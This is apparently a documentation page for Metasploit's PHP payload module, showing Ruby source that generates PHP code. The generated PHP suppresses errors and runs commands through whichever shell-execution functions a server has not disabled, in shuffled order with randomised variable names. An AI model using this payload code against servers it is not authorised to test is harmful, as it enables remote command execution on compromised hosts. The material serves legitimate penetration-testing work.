Module: Msf::Payload::Php
- Included in:
- Exploit::PhpEXE, BindTcp
- Defined in:
- lib/msf/core/payload/php.rb
Defined Under Namespace
Modules: BindTcp, ReverseTcp, SendUUID
Instance Method Summary
-
#php_preamble(options = {}) ⇒ String
Generate a chunk of PHP code that should be eval’d before #php_system_block.
-
#php_system_block(options = {}) ⇒ String
Generate a chunk of PHP code that tries to run a command.
Instance Method Details
#php_preamble(options = {}) ⇒ String
Generate a chunk of PHP code that should be eval’d before #php_system_block.
The generated code will initialize
# File 'lib/msf/core/payload/php.rb', line 19
#
# Generate the PHP that must be eval'd before #php_system_block.
#
# The emitted code silences error reporting, lifts the execution-time
# limits, reads the interpreter's `disable_functions` setting into the
# chosen variable and normalises it into an array of trimmed names (an
# empty setting becomes `array()`), so that #php_system_block can test
# each candidate function against it.
#
# @param options [Hash]
# @option options [String] :disabled_varname PHP variable that will hold
#   the disabled-functions array; a random 4-7 letter name is chosen when
#   absent, and a leading '$' is prepended when missing. The final name is
#   remembered in @dis for #php_system_block.
# @return [String] the PHP preamble
def php_preamble(options = {})
  name = options[:disabled_varname]
  name ||= '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
  name = "$#{name}" unless name.start_with?('$')
  @dis = name

  # Runs of commas and spaces are collapsed to a single comma before the
  # split, then every element is trimmed, so lookups can use exact names.
  <<~PHP
    /*<?php /**/ @error_reporting(0);@set_time_limit(0);@ignore_user_abort(1);@ini_set('max_execution_time',0);
    #{name}=@ini_get('disable_functions');
    if(!empty(#{name})){
      #{name}=preg_replace('/[, ]+/',',',#{name});
      #{name}=explode(',',#{name});
      #{name}=array_map('trim',#{name});
    }else{
      #{name}=array();
    }
  PHP
end
#php_system_block(options = {}) ⇒ String
Generate a chunk of PHP code that tries to run a command.
# File 'lib/msf/core/payload/php.rb', line 55
#
# Generate the PHP that tries to run the command held in the command
# variable and leaves its output in the output variable.
#
# The result is `setup` followed by an if/else chain over shell_exec,
# passthru, system, exec, proc_open and popen in random order; each branch
# is taken only when `is_callable` reports the function and it is not
# listed in the disabled-functions array from #php_preamble. A final
# fallback block sets the output variable to 0. On Windows (PHP_OS
# contains 'win') the setup appends " 2>&1\n" to the command first.
#
# @param options [Hash]
# @option options [String] :cmd_varname PHP variable holding the command
#   (default '$cmd')
# @option options [String] :disabled_varname PHP variable holding the array
#   built by #php_preamble; falls back to @dis, then to a random name
# @option options [String] :output_varname PHP variable that receives the
#   command output; random name when absent
# @return [String] the PHP execution block
def php_system_block(options = {})
  random_var = -> { '$' + Rex::Text.rand_text_alpha(rand(4) + 4) }
  with_dollar = ->(name) { name.start_with?('$') ? name : "$#{name}" }

  cmd_var = options[:cmd_varname] || '$cmd'
  dis_var = options[:disabled_varname] || @dis || random_var.call
  out_var = options[:output_varname] || random_var.call

  # NOTE(review): @dis is captured before the '$' prefix is normalised
  # below, so a :disabled_varname given without '$' is remembered without
  # it here, whereas #php_preamble stores the prefixed name.
  @dis = dis_var if @dis.nil?

  cmd_var = with_dollar.call(cmd_var)
  dis_var = with_dollar.call(dis_var)
  out_var = with_dollar.call(out_var)

  # is_callable and in_array are invoked through randomly named variables
  # assigned in the setup block.
  callable_var = random_var.call
  in_array_var = random_var.call

  setup = "
    if (FALSE!==stristr(PHP_OS,'win')){
      #{cmd_var}=#{cmd_var}.\" 2>&1\\n\";
    }
    #{callable_var}='is_callable';
    #{in_array_var}='in_array';
  "

  # Branch bodies keyed by the PHP function they rely on; each is wrapped by
  # `guarded` below with the callable / not-disabled check.
  branches = {
    'shell_exec' => "
      #{out_var}=`#{cmd_var}`;",
    'passthru' => "
      ob_start();
      passthru(#{cmd_var});
      #{out_var}=ob_get_contents();
      ob_end_clean();",
    'system' => "
      ob_start();
      system(#{cmd_var});
      #{out_var}=ob_get_contents();
      ob_end_clean();",
    'exec' => "
      #{out_var}=array();
      exec(#{cmd_var},#{out_var});
      #{out_var}=join(chr(10),#{out_var}).chr(10);",
    'proc_open' => "
      $handle=proc_open(#{cmd_var},array(array('pipe','r'),array('pipe','w'),array('pipe','w')),$pipes);
      #{out_var}=NULL;
      while(!feof($pipes[1])){
        #{out_var}.=fread($pipes[1],1024);
      }
      @proc_close($handle);",
    'popen' => "
      $fp=popen(#{cmd_var},'r');
      #{out_var}=NULL;
      if(is_resource($fp)){
        while(!feof($fp)){
          #{out_var}.=fread($fp,1024);
        }
      }
      @pclose($fp);"
  }

  # Currently unused until we can figure out how to get output with COM
  # objects (which are not subject to safe mode restrictions) instead of
  # PHP functions.
  #win32_com = "
  # if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) {
  #   $wscript = new COM('Wscript.Shell');
  #   $wscript->run(#{cmd_var} . ' > %TEMP%\\out.txt');
  #   #{out_var} = file_get_contents('%TEMP%\\out.txt');
  # }else"

  guarded = lambda do |fn, body|
    "
    if(#{callable_var}('#{fn}')&&!#{in_array_var}('#{fn}',#{dis_var})){#{body}
    }else"
  end

  fail_block = "
    {
      #{out_var}=0;
    }
  "

  chain = branches.map { |fn, body| guarded.call(fn, body) }.shuffle.join('')
  setup + chain + fail_block
end